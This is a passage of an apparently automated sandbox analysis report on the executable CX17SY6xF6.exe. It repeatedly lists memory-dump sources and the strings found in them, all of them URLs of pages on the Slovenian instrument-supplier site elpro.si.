                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/dodatni-izdelki-in-dodatki-za-tempe
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/pretvorniki-temperature/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/temperaturna-stikala-wika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/dodatni-izdelki-in-dodatki-za-tlak/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/manometri-wika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/tlacna-stikala-wika/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/wika-partner/tok/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kontakt/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/moj-racun/lost-password/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/nautiz-x6-na-dirkaliscu/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/o-podjetju/splosni-prodajni-pogoji/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/piskotki/
                  Source: CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podpo
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podpora/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/analiza-plinov/
